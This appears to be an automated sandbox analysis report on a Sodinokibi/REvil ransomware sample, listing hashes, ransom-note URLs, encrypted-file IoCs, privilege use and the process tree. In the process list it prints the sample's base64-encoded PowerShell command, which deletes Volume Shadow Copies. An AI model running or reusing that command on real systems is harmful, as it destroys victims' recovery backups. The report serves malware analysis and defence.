Analysis
- max time kernel: 141s
- max time network: 152s
- platform: windows10_x64
- resource: win10
- submitted: 21-10-2020 10:24
Static task
static1
Behavioral task
behavioral1
Sample
ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
Resource
win7
Behavioral task
behavioral2
Sample
ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
Resource
win10
General
- Target: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
- Size: 339KB
- MD5: a976d4247a7f411914a8d9caaa8efc09
- SHA1: ed7e0f161617547b89e41653c671b475cf6a4dd9
- SHA256: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88
- SHA512: 4abe367dfe139c429d4fb71f58c4ba72a6fd9f9906475a1d43c0971a1fa054de332a7854c3e3d3de22032c5838450618173be2cb0553bb5efdf21eea209d849a
Malware Config
Extracted
C:\001715yzkz-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/DFF35A85FE3383AA
http://decryptor.cc/DFF35A85FE3383AA
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
Processes: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
description ioc process
File renamed C:\Users\Admin\Pictures\RedoDeny.tif => \??\c:\users\admin\pictures\RedoDeny.tif.001715yzkz ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
File renamed C:\Users\Admin\Pictures\ReadClose.crw => \??\c:\users\admin\pictures\ReadClose.crw.001715yzkz ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
File renamed C:\Users\Admin\Pictures\ResetMerge.crw => \??\c:\users\admin\pictures\ResetMerge.crw.001715yzkz ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
File renamed C:\Users\Admin\Pictures\SendInvoke.png => \??\c:\users\admin\pictures\SendInvoke.png.001715yzkz ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
File renamed C:\Users\Admin\Pictures\SelectRevoke.tiff => \??\c:\users\admin\pictures\SelectRevoke.tiff.001715yzkz ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
File renamed C:\Users\Admin\Pictures\StopConvert.png => \??\c:\users\admin\pictures\StopConvert.png.001715yzkz ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
File opened for modification \??\c:\users\admin\pictures\SelectRevoke.tiff ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
File renamed C:\Users\Admin\Pictures\GroupBlock.crw => \??\c:\users\admin\pictures\GroupBlock.crw.001715yzkz ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Modifies service 2 TTPs 5 IoCs
Processes: vssvc.exe
description ioc process
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
description ioc process
Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\84l49qge5sv.bmp" ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
-
Drops file in Program Files directory 26 IoCs
-
Program crash 12 IoCs
Processes: WerFault.exe
pid pid_target process target process
1912 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
2532 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
988 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
2420 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
3712 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
1976 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
2632 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
3276 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
2244 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
200 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
3464 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
4024 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
-
Suspicious behavior: EnumeratesProcesses 183 IoCs
-
Suspicious use of AdjustPrivilegeToken 20 IoCs
Processes: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe, WerFault.exe, powershell.exe, vssvc.exe
description pid process
Token: SeDebugPrivilege 3016 ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
Token: SeRestorePrivilege 1912 WerFault.exe
Token: SeBackupPrivilege 1912 WerFault.exe
Token: SeDebugPrivilege 1524 powershell.exe
Token: SeDebugPrivilege 1912 WerFault.exe
Token: SeDebugPrivilege 2532 WerFault.exe
Token: SeBackupPrivilege 3220 vssvc.exe
Token: SeRestorePrivilege 3220 vssvc.exe
Token: SeAuditPrivilege 3220 vssvc.exe
Token: SeDebugPrivilege 988 WerFault.exe
Token: SeDebugPrivilege 2420 WerFault.exe
Token: SeTakeOwnershipPrivilege 3016 ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
Token: SeDebugPrivilege 3712 WerFault.exe
Token: SeDebugPrivilege 1976 WerFault.exe
Token: SeDebugPrivilege 2632 WerFault.exe
Token: SeDebugPrivilege 3276 WerFault.exe
Token: SeDebugPrivilege 2244 WerFault.exe
Token: SeDebugPrivilege 200 WerFault.exe
Token: SeDebugPrivilege 3464 WerFault.exe
Token: SeDebugPrivilege 4024 WerFault.exe
-
Suspicious use of WriteProcessMemory 2 IoCs
Processes: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
description pid process target process
PID 3016 wrote to memory of 1524 3016 ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe powershell.exe
PID 3016 wrote to memory of 1524 3016 ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
"C:\Users\Admin\AppData\Local\Temp\ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3016
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 656
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 808
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 840
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:988
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 884
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 924
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3712
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1068
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1120
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 992
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3276
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1264
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2244
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1248
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:200
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 868
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 852
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3220
-
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1052
Network
MITRE ATT&CK Enterprise v6